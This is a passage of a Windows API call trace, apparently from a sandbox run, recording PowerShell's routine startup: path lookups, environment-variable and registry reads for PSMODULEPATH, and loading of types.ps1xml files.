	[0270.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0271.441] SetConsoleCtrlHandler (HandlerRoutine=0x2be68dc, Add=1) returned 1
	[0271.988] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4
	[0271.990] CoCreateGuid (in: pguid=0x26db90 | out: pguid=0x26db90*(Data1=0x4fe4f052, Data2=0xc296, Data3=0x4fc1, Data4=([0]=0xb8, [1]=0x92, [2]=0xf6, [3]=0x65, [4]=0x50, [5]=0xed, [6]=0xb4, [7]=0xf1))) returned 0x0
	[0271.992] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0271.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0271.992] CoTaskMemFree (pv=0x518270) 
	[0271.998] WinSqmIsOptedIn () returned 0x0
	[0271.999] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0271.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0271.999] CoTaskMemFree (pv=0x518270) 
	[0272.000] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.000] CoTaskMemFree (pv=0x518270) 
	[0272.000] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.000] CoTaskMemFree (pv=0x518270) 
	[0272.001] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.001] CoTaskMemFree (pv=0x518270) 
	[0272.002] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.002] CoTaskMemFree (pv=0x518270) 
	[0272.003] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.003] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.004] CoTaskMemFree (pv=0x518270) 
	[0272.004] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.004] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.004] CoTaskMemFree (pv=0x518270) 
	[0272.535] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.536] CoTaskMemFree (pv=0x518270) 
	[0272.538] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.538] CoTaskMemFree (pv=0x518270) 
	[0272.543] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.543] CoTaskMemFree (pv=0x518270) 
	[0272.544] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.544] CoTaskMemFree (pv=0x518270) 
	[0272.544] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0272.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0272.544] CoTaskMemFree (pv=0x518270) 
	[0274.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0274.871] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0274.871] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0274.871] CoTaskMemFree (pv=0x518270) 
	[0274.873] CoTaskMemAlloc (cb=0xcc) returned 0x1b894970
	[0274.873] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b894970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0274.873] CoTaskMemFree (pv=0x1b894970) 
	[0274.873] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d708 | out: phkResult=0x26d708*=0x1cc) returned 0x0
	[0274.873] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d68c, lpData=0x0, lpcbData=0x26d688*=0x0 | out: lpType=0x26d68c*=0x2, lpData=0x0, lpcbData=0x26d688*=0x6c) returned 0x0
	[0274.873] CoTaskMemAlloc (cb=0x70) returned 0x4c2350
	[0274.873] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d65c, lpData=0x4c2350, lpcbData=0x26d658*=0x6c | out: lpType=0x26d65c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x26d658*=0x6c) returned 0x0
	[0274.873] CoTaskMemFree (pv=0x4c2350) 
	[0274.873] CoTaskMemAlloc (cb=0xcc) returned 0x1b894970
	[0274.873] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b894970, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0274.873] CoTaskMemFree (pv=0x1b894970) 
	[0274.873] CoTaskMemAlloc (cb=0xcc) returned 0x1b894970
	[0274.873] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b894970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0274.873] CoTaskMemFree (pv=0x1b894970) 
	[0274.878] RegCloseKey (hKey=0x1cc) returned 0x0
	[0274.878] CoTaskMemAlloc (cb=0xcc) returned 0x1b894970
	[0274.878] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b894970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0274.878] CoTaskMemFree (pv=0x1b894970) 
	[0274.879] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d708 | out: phkResult=0x26d708*=0x1cc) returned 0x0
	[0274.879] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x26d68c, lpData=0x0, lpcbData=0x26d688*=0x0 | out: lpType=0x26d68c*=0x0, lpData=0x0, lpcbData=0x26d688*=0x0) returned 0x2
	[0274.879] RegCloseKey (hKey=0x1cc) returned 0x0
	[0274.883] CoTaskMemAlloc (cb=0x20c) returned 0x513c20
	[0274.884] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x513c20 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0274.885] CoTaskMemFree (pv=0x513c20) 
	[0274.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d290, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0274.886] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0275.319] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0275.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.320] CoTaskMemFree (pv=0x518270) 
	[0275.320] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0275.320] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.320] CoTaskMemFree (pv=0x518270) 
	[0275.331] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0275.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.331] CoTaskMemFree (pv=0x518270) 
	[0275.331] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0275.331] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.331] CoTaskMemFree (pv=0x518270) 
	[0275.333] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4f8 | out: phkResult=0x26d4f8*=0x328) returned 0x0
	[0275.334] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d50c, lpData=0x0, lpcbData=0x26d508*=0x0 | out: lpType=0x26d50c*=0x1, lpData=0x0, lpcbData=0x26d508*=0x74) returned 0x0
	[0275.335] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d47c, lpData=0x0, lpcbData=0x26d478*=0x0 | out: lpType=0x26d47c*=0x1, lpData=0x0, lpcbData=0x26d478*=0x74) returned 0x0
	[0275.335] CoTaskMemAlloc (cb=0x78) returned 0x4c2350
	[0275.335] RegQueryValueExW (in: hKey=0x328, lpValueName="path", lpReserved=0x0, lpType=0x26d44c, lpData=0x4c2350, lpcbData=0x26d448*=0x74 | out: lpType=0x26d44c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x26d448*=0x74) returned 0x0
	[0275.335] CoTaskMemFree (pv=0x4c2350) 
	[0275.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0275.335] SetErrorMode (uMode=0x1) returned 0x1
	[0275.335] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x26d3d0 | out: lpFileInformation=0x26d3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0275.335] SetErrorMode (uMode=0x1) returned 0x1
	[0275.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0275.336] SetErrorMode (uMode=0x1) returned 0x1
	[0275.336] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3d0 | out: lpFileInformation=0x26d3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0275.336] SetErrorMode (uMode=0x1) returned 0x1
	[0275.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0275.337] SetErrorMode (uMode=0x1) returned 0x1
	[0275.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d3d0 | out: lpFileInformation=0x26d3d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0275.337] SetErrorMode (uMode=0x1) returned 0x1
	[0275.338] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0275.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.338] CoTaskMemFree (pv=0x518270) 
	[0275.341] CoTaskMemAlloc (cb=0x104) returned 0x518270
	[0275.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x518270, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0275.341] CoTaskMemFree (pv=0x518270) 
	[0275.341] GetACP () returned 0x4e4
	[0275.349] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0275.349] SetErrorMode (uMode=0x1) returned 0x1
	[0275.350] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0275.350] GetFileType (hFile=0x32c) returned 0x1
	[0275.350] SetErrorMode (uMode=0x1) returned 0x1
	[0275.350] GetFileType (hFile=0x32c) returned 0x1
	[0275.352] ReadFile (in: hFile=0x32c, lpBuffer=0x2e88858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2e88858*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0275.355] ReadFile (in: hFile=0x32c, lpBuffer=0x2e88858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2e88858*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0275.355] ReadFile (in: hFile=0x32c, lpBuffer=0x2e88858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2e88858*, lpNumberOfBytesRead=0x26d308*=0x1000, lpOverlapped=0x0) returned 1
	[0275.356] ReadFile (in: hFile=0x32c, lpBuffer=0x2e88858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2e88858*, lpNumberOfBytesRead=0x26d308*=0xcf3, lpOverlapped=0x0) returned 1
	[0275.356] ReadFile (in: hFile=0x32c, lpBuffer=0x2e87cb3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2e87cb3*, lpNumberOfBytesRead=0x26d308*=0x0, lpOverlapped=0x0) returned 1
	[0275.356] ReadFile (in: hFile=0x32c, lpBuffer=0x2e88858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26d308, lpOverlapped=0x0 | out: lpBuffer=0x2e88858*, lpNumberOfBytesRead=0x26d308*=0x0, lpOverlapped=0x0) returned 1
	[0275.760] CloseHandle (hObject=0x32c) returned 1
	[0275.762] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26d020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0275.762] SetErrorMode (uMode=0x1) returned 0x1
	[0275.763] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26d280 | out: lpFileInformation=0x26d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0275.763] SetErrorMode (uMode=0x1) returned 0x1
	[0275.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x26cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0275.764] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d368 | out: phkResult=0x26d368*=0x32c) returned 0x0
